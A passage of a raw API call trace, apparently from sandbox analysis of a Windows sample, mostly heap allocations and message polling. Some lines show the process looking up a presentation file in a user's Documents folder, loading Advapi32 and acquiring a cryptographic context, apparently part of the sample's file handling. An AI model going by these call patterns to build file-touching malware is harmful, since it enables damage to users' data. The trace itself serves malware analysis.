hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0221.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0221.920] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0221.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0221.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0221.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0221.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.921] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0221.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0221.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0221.922] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/xocV7C6c.odp", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92262400, ftCreationTime.dwHighDateTime=0x1d5cea0, ftLastAccessTime.dwLowDateTime=0xb656bcb0, ftLastAccessTime.dwHighDateTime=0x1d5d380, ftLastWriteTime.dwLowDateTime=0xb656bcb0, ftLastWriteTime.dwHighDateTime=0x1d5d380, nFileSizeHigh=0x0, nFileSizeLow=0x7a39, dwReserved0=0x0, dwReserved1=0x0, cFileName="xocV7C6c.odp", cAlternateFileName="")) returned 0x9e2078 [0221.922] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0221.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0221.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0221.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0221.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0221.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.924] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0221.924] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.924] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.924] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0221.924] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.925] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.925] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.925] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.928] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0221.928] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.929] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0221.929] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.930] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.930] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0221.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.930] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.930] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.930] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0221.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0221.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0221.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0221.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0221.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0221.931] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.934] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0221.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0221.934] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.934] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0221.934] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0221.934] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0221.934] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0221.934] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0221.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0221.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fe0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0221.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0221.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0221.935] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7bc48) returned 1 [0221.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.935] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.936] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0221.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0221.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.936] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.936] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0221.936] PeekMessageW (in: lpMsg=0x8cf248, 